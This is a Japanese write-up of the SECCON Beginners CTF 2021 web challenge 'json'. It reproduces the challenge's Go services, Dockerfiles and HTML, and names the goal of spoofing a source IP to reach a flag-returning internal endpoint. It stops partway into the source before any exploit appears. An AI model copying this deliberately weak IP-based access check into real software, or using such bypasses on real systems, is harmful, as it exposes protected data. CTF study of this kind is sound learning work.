SECCON Beginners CTF 2021 writeup(web:json)

※本サイトはアフィリエイト広告を利用しています。
広告

SECCON Beginners CTFと本記事について

2021年5月22日と2021年5月23日に開催された「SECCON Beginners CTF 2021」の「web」の「json」問題について、解きましたので、手順を詳細に記載します。

web(json)

以下の問題文に記載がありますが、jsonデータを使用する問題のようです。
SECCON Beginners CTF 2021_web_json(1)

問題に記載されているWebページにアクセスすると、以下の画面が表示されます。
ローカルネットワーク(192.168.111.0/24)からアクセスすると、内部ページが表示されます。
SECCON Beginners CTF 2021_web_check_json(2)-1

送信元IPアドレスを詐称する方法を探すために、提供されたファイルを確認します。
提供されたファイルは13個のファイルが提供されています。

ARG GO_VERSION=1.16
ARG ALPINE_VERSION=3.12

# build-stage

FROM golang:${GO_VERSION}-alpine${ALPINE_VERSION} as build-stage

WORKDIR /app

COPY go.mod .
COPY go.sum .

RUN go mod download

COPY . .

RUN go build

# roduction-stage

FROM alpine:${ALPINE_VERSION} as production-stage

RUN addgroup appgroup && adduser --disabled-password --no-create-home appuser -G appgroup

WORKDIR /app

COPY --from=build-stage /app/api .

RUN chown -R appuser:appgroup /app

RUN chmod +x ./api

USER appuser

CMD ./api
module api

go 1.16

require (
	github.com/buger/jsonparser v1.1.1
	github.com/gin-gonic/gin v1.6.3
	github.com/go-playground/validator/v10 v10.4.1 // indirect
	github.com/golang/protobuf v1.5.2 // indirect
	github.com/json-iterator/go v1.1.10 // indirect
	github.com/leodido/go-urn v1.2.1 // indirect
	github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd // indirect
	github.com/modern-go/reflect2 v1.0.1 // indirect
	github.com/ugorji/go v1.2.5 // indirect
	golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2 // indirect
	golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57 // indirect
	gopkg.in/yaml.v2 v2.4.0 // indirect
)
github.com/buger/jsonparser v1.1.1 h1:2PnMjfWD7wBILjqQbt530v576A/cAbQvEW9gGIpYMUs=
github.com/buger/jsonparser v1.1.1/go.mod h1:6RYKKt7H4d4+iWqouImQ9R2FZql3VbhNgx27UK13J/0=
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
github.com/gin-contrib/sse v0.1.0 h1:Y/yl/+YNO8GZSjAhjMsSuLt29uWRFHdHYUb5lYOV9qE=
github.com/gin-contrib/sse v0.1.0/go.mod h1:RHrZQHXnP2xjPF+u1gW/2HnVO7nvIa9PG3Gm+fLHvGI=
github.com/gin-gonic/gin v1.6.3 h1:ahKqKTFpO5KTPHxWZjEdPScmYaGtLo8Y4DMHoEsnp14=
github.com/gin-gonic/gin v1.6.3/go.mod h1:75u5sXoLsGZoRN5Sgbi1eraJ4GU3++wFwWzhwvtwp4M=
github.com/go-playground/assert/v2 v2.0.1 h1:MsBgLAaY856+nPRTKrp3/OZK38U/wa0CcBYNjji3q3A=
github.com/go-playground/assert/v2 v2.0.1/go.mod h1:VDjEfimB/XKnb+ZQfWdccd7VUvScMdVu0Titje2rxJ4=
github.com/go-playground/locales v0.13.0 h1:HyWk6mgj5qFqCT5fjGBuRArbVDfE4hi8+e8ceBS/t7Q=
github.com/go-playground/locales v0.13.0/go.mod h1:taPMhCMXrRLJO55olJkUXHZBHCxTMfnGwq/HNwmWNS8=
github.com/go-playground/universal-translator v0.17.0 h1:icxd5fm+REJzpZx7ZfpaD876Lmtgy7VtROAbHHXk8no=
github.com/go-playground/universal-translator v0.17.0/go.mod h1:UkSxE5sNxxRwHyU+Scu5vgOQjsIJAF8j9muTVoKLVtA=
github.com/go-playground/validator/v10 v10.2.0/go.mod h1:uOYAAleCW8F/7oMFd6aG0GOhaH6EGOAJShg8Id5JGkI=
github.com/go-playground/validator/v10 v10.4.1 h1:pH2c5ADXtd66mxoE0Zm9SUhxE20r7aM3F26W0hOn+GE=
github.com/go-playground/validator/v10 v10.4.1/go.mod h1:nlOn6nFhuKACm19sB/8EGNn9GlaMV7XkbRSipzJ0Ii4=
github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw=
github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk=
github.com/golang/protobuf v1.5.2 h1:ROPKBNFfQgOUMifHyP+KYbvpjbdoFNs+aK7DXlji0Tw=
github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY=
github.com/google/go-cmp v0.5.5 h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU=
github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
github.com/json-iterator/go v1.1.9/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4=
github.com/json-iterator/go v1.1.10 h1:Kz6Cvnvv2wGdaG/V8yMvfkmNiXq9Ya2KUv4rouJJr68=
github.com/json-iterator/go v1.1.10/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4=
github.com/leodido/go-urn v1.2.0/go.mod h1:+8+nEpDfqqsY+g338gtMEUOtuK+4dEMhiQEgxpxOKII=
github.com/leodido/go-urn v1.2.1 h1:BqpAaACuzVSgi/VLzGZIobT2z4v53pjosyNd9Yv6n/w=
github.com/leodido/go-urn v1.2.1/go.mod h1:zt4jvISO2HfUBqxjfIshjdMTYS56ZS/qv49ictyFfxY=
github.com/mattn/go-isatty v0.0.12 h1:wuysRhFDzyxgEmMf5xjvJ2M9dZoWAXNNr5LSBS7uHXY=
github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU=
github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd h1:TRLaZ9cD/w8PVh93nsPXa1VrQ6jlwL5oN8l14QlcNfg=
github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
github.com/modern-go/reflect2 v0.0.0-20180701023420-4b7aa43c6742/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0=
github.com/modern-go/reflect2 v1.0.1 h1:9f412s+6RmYXLWZSEzVVgPGK7C2PphHj5RJrvfx9AWI=
github.com/modern-go/reflect2 v1.0.1/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0=
github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI=
github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4=
github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0=
github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
github.com/ugorji/go v1.1.7/go.mod h1:kZn38zHttfInRq0xu/PH0az30d+z6vm202qpg1oXVMw=
github.com/ugorji/go v1.2.5 h1:NozRHfUeEta89taVkyfsDVSy2f7v89Frft4pjnWuGuc=
github.com/ugorji/go v1.2.5/go.mod h1:gat2tIT8KJG8TVI8yv77nEO/KYT6dV7JE1gfUa8Xuls=
github.com/ugorji/go/codec v1.1.7/go.mod h1:Ax+UKWsSmolVDwsd+7N3ZtXu+yMGCf907BLYF3GoBXY=
github.com/ugorji/go/codec v1.2.5 h1:8WobZKAk18Msm2CothY2jnztY56YVY8kF1oQrj21iis=
github.com/ugorji/go/codec v1.2.5/go.mod h1:QPxoTbPKSEAlAHPYt02++xp/en9B/wUdwFCz+hj5caA=
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2 h1:It14KIkyBFYkHkwZ7k45minvA9aorojkyjGk9KJ5B/w=
golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4=
golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57 h1:F5Gozwx4I1xtr/sr/8CFbb57iKi3297KFs0QDbGN60A=
golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk=
golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw=
google.golang.org/protobuf v1.26.0 h1:bxAC2xTBsZGibn2RTntX0oH50xLsqy1OxA9tTL3p/lk=
google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY=
gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ=
gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo=
gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
package main

import (
	"io/ioutil"
	"os"

	"github.com/buger/jsonparser"
	"github.com/gin-gonic/gin"
)

func main() {
	r := gin.Default()

	r.POST("/", func(c *gin.Context) {
		body, err := ioutil.ReadAll(c.Request.Body)
		if err != nil {
			c.String(400, "Failed to read body")
			return
		}

		id, err := jsonparser.GetInt(body, "id")
		if err != nil {
			c.String(400, "Failed to parse json")
			return
		}

		if id == 0 {
			c.String(200, "The quick brown fox jumps over the lazy dog.")
			return
		}
		if id == 1 {
			c.String(200, "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.")
			return
		}
		if id == 2 {
			// Flag!!!
			flag := os.Getenv("FLAG")
			c.String(200, flag)
			return
		}

		c.String(400, "No data")
	})

	if err := r.Run(":8000"); err != nil {
		panic("server is not started")
	}
}
<!DOCTYPE html>
<html>

<head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <title>Internal Website / 内部ページ</title>
 <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.9.2/css/bulma.min.css">
</head>

<body>
 <section class="section">
  <div class="container">
   <h1 class="title">Internal Website / 内部ページ</h1>
   <p class="mt-2">このページはローカルネットワーク(192.168.111.0/24)内の端末からのみ閲覧できます。This page can only be viewed from a device within the local network(192.168.111.0/24).</p>
   <p class="mt-2">あなたのIPアドレスは"{{ .ip }}"です。Your IP adress is "{{ .ip }}".</p>
   <p class="mt-2">あなたはこのページを閲覧できません。You are not allowed to view this page.</p>
  </div>
 </section>
</body>

</html>
<!DOCTYPE html>
<html>
 <head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Internal Website / 内部ページ</title>
  <link
   rel="stylesheet"
   href="https://cdn.jsdelivr.net/npm/bulma@0.9.2/css/bulma.min.css"
  />
 </head>

 <body>
  <section class="section">
   <div class="container">
    <h1 class="title">Internal Website / 内部ページ</h1>
    <p class="subtitle mt-1">
     You can get special information in this page.
    </p>
    <div class="field">
     <label class="label">Select item</label>
     <div class="control">
      <div class="select">
       <select id="item">
        <option>Quick brown fox</option>
        <option>Lorem ipsum</option>
        <option>Flag</option>
       </select>
      </div>
     </div>
    </div>
    <div class="field is-grouped">
     <div class="control">
      <button id="submit" class="button is-link">Submit</button>
     </div>
    </div>
    <div id="message"></div>
   </div>
  </section>
  <script>
   let submit = document.getElementById("submit");
   let message = document.getElementById("message");
   submit.addEventListener("click", (event) => {
    message.innerHTML = "";
    let xhr = new XMLHttpRequest();
    xhr.open("POST", "/");
    xhr.setRequestHeader("Content-Type", "application/json");
    xhr.onload = () => {
     if (xhr.status === 200) {
      message.innerHTML =
       '<article class="message is-success"><div class="message-header"><p>Success</p></div><div class="message-body">' +
       JSON.parse(xhr.response).result +
       "</div></article>";
     } else {
      message.innerHTML =
       '<article class="message is-danger"><div class="message-header"><p>Error</p></div><div class="message-body">' +
       JSON.parse(xhr.response).error +
       "</div></article>";
     }
    };
    data = JSON.stringify({
     id: document.getElementById("item").selectedIndex,
    });
    xhr.send(data);
   });
  </script>
 </body>
</html>
ARG GO_VERSION=1.16
ARG ALPINE_VERSION=3.12

# build-stage

FROM golang:${GO_VERSION}-alpine${ALPINE_VERSION} as build-stage

WORKDIR /app

COPY go.mod .
COPY go.sum .

RUN go mod download

COPY . .

RUN go build

# roduction-stage

FROM alpine:${ALPINE_VERSION} as production-stage

RUN addgroup appgroup && adduser --disabled-password --no-create-home appuser -G appgroup

WORKDIR /app

COPY --from=build-stage /app/bff .
COPY ./templates ./templates

RUN chown -R appuser:appgroup /app

RUN chmod +x ./bff

USER appuser

CMD ./bff
module bff

go 1.16

require (
	github.com/gin-gonic/gin v1.6.3
	github.com/go-playground/validator/v10 v10.4.1 // indirect
	github.com/golang/protobuf v1.5.2 // indirect
	github.com/json-iterator/go v1.1.10 // indirect
	github.com/leodido/go-urn v1.2.1 // indirect
	github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd // indirect
	github.com/modern-go/reflect2 v1.0.1 // indirect
	github.com/ugorji/go v1.2.5 // indirect
	golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2 // indirect
	golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57 // indirect
	gopkg.in/yaml.v2 v2.4.0 // indirect
)
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
github.com/gin-contrib/sse v0.1.0 h1:Y/yl/+YNO8GZSjAhjMsSuLt29uWRFHdHYUb5lYOV9qE=
github.com/gin-contrib/sse v0.1.0/go.mod h1:RHrZQHXnP2xjPF+u1gW/2HnVO7nvIa9PG3Gm+fLHvGI=
github.com/gin-gonic/gin v1.6.3 h1:ahKqKTFpO5KTPHxWZjEdPScmYaGtLo8Y4DMHoEsnp14=
github.com/gin-gonic/gin v1.6.3/go.mod h1:75u5sXoLsGZoRN5Sgbi1eraJ4GU3++wFwWzhwvtwp4M=
github.com/go-playground/assert/v2 v2.0.1 h1:MsBgLAaY856+nPRTKrp3/OZK38U/wa0CcBYNjji3q3A=
github.com/go-playground/assert/v2 v2.0.1/go.mod h1:VDjEfimB/XKnb+ZQfWdccd7VUvScMdVu0Titje2rxJ4=
github.com/go-playground/locales v0.13.0 h1:HyWk6mgj5qFqCT5fjGBuRArbVDfE4hi8+e8ceBS/t7Q=
github.com/go-playground/locales v0.13.0/go.mod h1:taPMhCMXrRLJO55olJkUXHZBHCxTMfnGwq/HNwmWNS8=
github.com/go-playground/universal-translator v0.17.0 h1:icxd5fm+REJzpZx7ZfpaD876Lmtgy7VtROAbHHXk8no=
github.com/go-playground/universal-translator v0.17.0/go.mod h1:UkSxE5sNxxRwHyU+Scu5vgOQjsIJAF8j9muTVoKLVtA=
github.com/go-playground/validator/v10 v10.2.0/go.mod h1:uOYAAleCW8F/7oMFd6aG0GOhaH6EGOAJShg8Id5JGkI=
github.com/go-playground/validator/v10 v10.4.1 h1:pH2c5ADXtd66mxoE0Zm9SUhxE20r7aM3F26W0hOn+GE=
github.com/go-playground/validator/v10 v10.4.1/go.mod h1:nlOn6nFhuKACm19sB/8EGNn9GlaMV7XkbRSipzJ0Ii4=
github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw=
github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk=
github.com/golang/protobuf v1.5.2 h1:ROPKBNFfQgOUMifHyP+KYbvpjbdoFNs+aK7DXlji0Tw=
github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY=
github.com/google/go-cmp v0.5.5 h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU=
github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
github.com/json-iterator/go v1.1.9/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4=
github.com/json-iterator/go v1.1.10 h1:Kz6Cvnvv2wGdaG/V8yMvfkmNiXq9Ya2KUv4rouJJr68=
github.com/json-iterator/go v1.1.10/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4=
github.com/leodido/go-urn v1.2.0/go.mod h1:+8+nEpDfqqsY+g338gtMEUOtuK+4dEMhiQEgxpxOKII=
github.com/leodido/go-urn v1.2.1 h1:BqpAaACuzVSgi/VLzGZIobT2z4v53pjosyNd9Yv6n/w=
github.com/leodido/go-urn v1.2.1/go.mod h1:zt4jvISO2HfUBqxjfIshjdMTYS56ZS/qv49ictyFfxY=
github.com/mattn/go-isatty v0.0.12 h1:wuysRhFDzyxgEmMf5xjvJ2M9dZoWAXNNr5LSBS7uHXY=
github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU=
github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd h1:TRLaZ9cD/w8PVh93nsPXa1VrQ6jlwL5oN8l14QlcNfg=
github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
github.com/modern-go/reflect2 v0.0.0-20180701023420-4b7aa43c6742/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0=
github.com/modern-go/reflect2 v1.0.1 h1:9f412s+6RmYXLWZSEzVVgPGK7C2PphHj5RJrvfx9AWI=
github.com/modern-go/reflect2 v1.0.1/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0=
github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI=
github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4=
github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0=
github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
github.com/ugorji/go v1.1.7/go.mod h1:kZn38zHttfInRq0xu/PH0az30d+z6vm202qpg1oXVMw=
github.com/ugorji/go v1.2.5 h1:NozRHfUeEta89taVkyfsDVSy2f7v89Frft4pjnWuGuc=
github.com/ugorji/go v1.2.5/go.mod h1:gat2tIT8KJG8TVI8yv77nEO/KYT6dV7JE1gfUa8Xuls=
github.com/ugorji/go/codec v1.1.7/go.mod h1:Ax+UKWsSmolVDwsd+7N3ZtXu+yMGCf907BLYF3GoBXY=
github.com/ugorji/go/codec v1.2.5 h1:8WobZKAk18Msm2CothY2jnztY56YVY8kF1oQrj21iis=
github.com/ugorji/go/codec v1.2.5/go.mod h1:QPxoTbPKSEAlAHPYt02++xp/en9B/wUdwFCz+hj5caA=
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2 h1:It14KIkyBFYkHkwZ7k45minvA9aorojkyjGk9KJ5B/w=
golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4=
golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57 h1:F5Gozwx4I1xtr/sr/8CFbb57iKi3297KFs0QDbGN60A=
golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk=
golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw=
google.golang.org/protobuf v1.26.0 h1:bxAC2xTBsZGibn2RTntX0oH50xLsqy1OxA9tTL3p/lk=
google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY=
gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ=
gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo=
gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
package main

import (
	"bytes"
	"encoding/json"
	"io/ioutil"
	"net"
	"net/http"

